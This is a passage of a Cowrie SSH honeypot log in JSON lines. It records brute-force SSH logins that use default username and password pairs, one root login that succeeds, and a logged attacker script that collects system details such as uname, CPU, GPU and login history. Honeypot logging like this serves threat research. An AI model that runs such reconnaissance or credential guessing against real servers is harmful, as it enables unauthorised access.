\t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T12:01:51.533920Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T12:01:51.534385Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T12:01:51.535631Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T12:01:51.536629Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T12:01:51.537438Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T12:01:51.538106Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T12:01:51.538851Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T12:01:51.539298Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T12:01:51.539679Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T12:01:51.540160Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T12:01:51.540580Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T12:01:51.540948Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T12:01:52.007005Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:01:52.007953Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:01:52.008961Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38282,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5a0dae83f53","protocol":"ssh","message":"New connection: 196.251.86.249:38282 (1.2.3.4:22) [session: f5a0dae83f53]","sensor":"my-vps","timestamp":"2025-08-26T12:01:57.107031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:01:57.836863Z","src_ip":"196.251.86.249","session":"f5a0dae83f53"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:01:57.837646Z","src_ip":"196.251.86.249","session":"f5a0dae83f53"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":52810,"dst_ip":"1.2.3.4","dst_port":22,"session":"478358e4a627","protocol":"ssh","message":"New connection: 83.168.105.65:52810 (1.2.3.4:22) [session: 478358e4a627]","sensor":"my-vps","timestamp":"2025-08-26T12:01:57.861141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:01:57.861978Z","src_ip":"83.168.105.65","session":"478358e4a627"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:01:57.899374Z","src_ip":"83.168.105.65","session":"478358e4a627"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:01:58.013588Z","src_ip":"83.168.105.65","session":"478358e4a627"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:01:59.052967Z","src_ip":"83.168.105.65","session":"478358e4a627"}
{"eventid":"cowrie.login.failed","username":"git","password":"qwerty","message":"login attempt [git/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-26T12:02:00.605808Z","src_ip":"196.251.86.249","session":"f5a0dae83f53"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:02:02.137879Z","src_ip":"196.251.86.249","session":"f5a0dae83f53"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":39294,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dbd1591a000","protocol":"ssh","message":"New connection: 83.168.105.65:39294 (1.2.3.4:22) [session: 7dbd1591a000]","sensor":"my-vps","timestamp":"2025-08-26T12:02:13.193008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:02:13.194165Z","src_ip":"83.168.105.65","session":"7dbd1591a000"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:02:13.230738Z","src_ip":"83.168.105.65","session":"7dbd1591a000"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T12:02:13.342415Z","src_ip":"83.168.105.65","session":"7dbd1591a000"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:02:14.381541Z","src_ip":"83.168.105.65","session":"7dbd1591a000"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65142,"dst_ip":"1.2.3.4","dst_port":22,"session":"712b015680b3","protocol":"ssh","message":"New connection: 217.72.205.35:65142 (1.2.3.4:22) [session: 712b015680b3]","sensor":"my-vps","timestamp":"2025-08-26T12:02:17.409552Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:02:17.410766Z","src_ip":"217.72.205.35","session":"712b015680b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41020,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e378bc1a9ce","protocol":"ssh","message":"New connection: 212.227.235.229:41020 (1.2.3.4:22) [session: 7e378bc1a9ce]","sensor":"my-vps","timestamp":"2025-08-26T12:02:24.728832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:02:25.217881Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:02:25.218984Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:02:28.235019Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41440,"dst_ip":"1.2.3.4","dst_port":22,"session":"794846133e5f","protocol":"ssh","message":"New connection: 83.168.105.65:41440 (1.2.3.4:22) [session: 794846133e5f]","sensor":"my-vps","timestamp":"2025-08-26T12:02:28.735131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:02:28.736122Z","src_ip":"83.168.105.65","session":"794846133e5f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:02:28.771681Z","src_ip":"83.168.105.65","session":"794846133e5f"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia123","message":"login attempt [nvidia/nvidia123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:02:28.922888Z","src_ip":"83.168.105.65","session":"794846133e5f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:02:29.033921Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.034620Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.035222Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.036299Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.037506Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.038398Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.039212Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.040220Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.040723Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.041308Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.041902Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.042525Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.043017Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.438067Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
